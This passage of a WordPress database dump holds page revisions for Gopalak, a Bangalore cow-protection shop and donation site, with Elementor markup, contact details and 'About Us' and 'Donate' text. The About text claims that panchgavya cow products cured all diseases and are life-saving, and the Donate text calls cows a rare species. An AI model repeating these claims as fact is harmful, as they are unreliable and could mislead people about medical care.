towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','AboutUs','','inherit','closed','closed','','1804-revision-v1','','','2022-10-28 10:36:54','2022-10-28 05:06:54','',1804,'https://gopalak.in/?p=2001',0,'revision','',0),(2002,1,'2022-10-28 10:36:54','2022-10-28 05:06:54','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>													<a href=\"https://gopalak.in/\">\n							<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />								</a>\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','AboutUs','','inherit','closed','closed','','1804-revision-v1','','','2022-10-28 10:36:54','2022-10-28 05:06:54','',1804,'https://gopalak.in/?p=2002',0,'revision','',0),(2004,1,'2022-10-28 10:39:57','2022-10-28 05:09:57','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>													<a href=\"https://gopalak.in/\">\n							<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />								</a>\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','Donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-28 10:39:57','2022-10-28 05:09:57','',1816,'https://gopalak.in/?p=2004',0,'revision','',0),(2005,1,'2022-10-28 10:39:57','2022-10-28 05:09:57','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>													<a href=\"https://gopalak.in/\">\n							<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />								</a>\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon 